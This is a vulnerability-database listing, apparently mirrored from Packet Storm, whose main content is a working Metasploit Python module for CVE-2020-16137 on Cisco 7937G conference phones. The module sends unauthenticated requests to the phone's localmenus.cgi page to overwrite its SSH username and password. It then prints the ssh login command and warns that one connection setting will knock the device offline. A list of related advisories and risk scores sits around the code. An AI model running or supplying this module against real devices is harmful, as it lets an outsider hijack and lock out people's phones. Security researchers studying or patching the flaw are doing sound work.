Cisco 7937G Privilege Escalation

🗓️ 10 Aug 2020 00:00:00Reported by Cody MartinType

packetstorm🔗 packetstormsecurity.com👁 201 Views

Cisco 7937G Privilege Escalation MSF Module, sets SSH credentials to supplied values, vendor Cisco, version <=SIP-1-4-5-7, CVE-2020-1613

Reporter	Title	Published	Views	Family All 11
0day.today	Cisco 7937G All-In-One Exploiter Exploit	11 Aug 202000:00	–	zdt
Circl	CVE-2020-16137	11 Aug 202011:07	–	circl
CNVD	Cisco 7947G Elevation of Privilege Vulnerability	14 Aug 202000:00	–	cnvd
Check Point Advisories	Cisco Unified IP Conference Station Privilege Escalation (CVE-2020-16137)	5 Nov 202000:00	–	checkpoint_advisories
CVE	CVE-2020-16137	12 Aug 202020:07	–	cve
Cvelist	CVE-2020-16137	12 Aug 202020:07	–	cvelist
NVD	CVE-2020-16137	12 Aug 202021:15	–	nvd
OSV	CVE-2020-16137	12 Aug 202021:15	–	osv
Packet Storm	Cisco 7937G All-In-One Exploiter	10 Aug 202000:00	–	packetstorm
Prion	Privilege escalation	12 Aug 202021:15	–	prion

`# Exploit Title: Cisco 7937G Prvilege Escalation MSF Module  
# Date: 2020-08-10  
# Exploit Author: Cody Martin  
# Vendor Homepage: https://cisco.com  
# Version: <=SIP-1-4-5-7  
# Tested On: SIP-1-4-5-5, SIP-1-4-5-7  
# CVE: CVE-2020-16137  
  
#!/usr/bin/env python3  
# -*- coding: utf-8 -*-  
  
# standard modules  
import logging  
  
# extra modules  
dependency_missing = False  
  
try:  
import requests  
except ImportError:  
dependency_missing = True  
  
from metasploit import module  
  
  
metadata = {  
'name': 'Cisco 7937G SSH Privilege Escalation',  
'description': '''  
Sets SSH credentials to whatever is supplied.  
''',  
'authors': [  
'Cody Martin'  
],  
'date': '2020-06-02',  
'license': 'GPL_LICENSE',  
'references': [  
{'type': 'url', 'ref': '<url>'},  
{'type': 'cve', 'ref': '2020-#'},  
{'type': 'edb', 'ref': '#'}  
],  
'type': 'single_scanner',  
'options': {  
'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': ''},  
'USER': {'type': 'string', 'description': 'Desired username', 'required': True, 'default': ''},  
'PASS': {'type': 'string', 'description': 'Desired password', 'required': True, 'default': ''},  
'TIMEOUT': {'type': 'int', 'description': 'Timeout in seconds', 'required': True, 'default': 5}  
}  
}  
  
  
def run(args):  
module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))  
if dependency_missing:  
logging.error('Module dependency (requests) is missing, cannot continue')  
return  
  
# Exploit  
url = "http://{}/localmenus.cgi".format(args['rhost'])  
payload_user = {"func": "403", "set": "401", "name1": args['USER'], "name2": args['USER']}  
payload_pass = {"func": "403", "set": "402", "pwd1": args['PASS'], "pwd2": args['PASS']}  
logging.info("FIRING ZE MIZZLES!")  
try:  
r = requests.post(url=url, params=payload_user, timeout=int(args['TIMEOUT']))  
if r.status_code != 200:  
logging.error("Device doesn't appear to be functioning or web access is not enabled.")  
return  
  
r = requests.post(url=url, params=payload_pass, timeout=int(args['TIMEOUT']))  
if r.status_code != 200:  
logging.error("Device doesn't appear to be functioning or web access is not enabled.")  
return  
except requests.exceptions.RequestException:  
logging.error("Device doesn't appear to be functioning or web access is not enabled.")  
return  
  
logging.info("SSH attack finished!")  
logging.info(("Try to login using the supplied credentials {}:{}").format(args['USER'], args['PASS']))  
logging.info("You must specify the key exchange when connecting or the device will be DoS'd!")  
logging.info(("ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 {}@{}").format(args['USER'], args['rhost']))  
  
return  
  
  
if __name__ == "__main__":  
module.run(metadata, run)  
`

10 Aug 2020 00:00Current

0.7Low risk

Vulners AI Score0.7

EPSS0.73245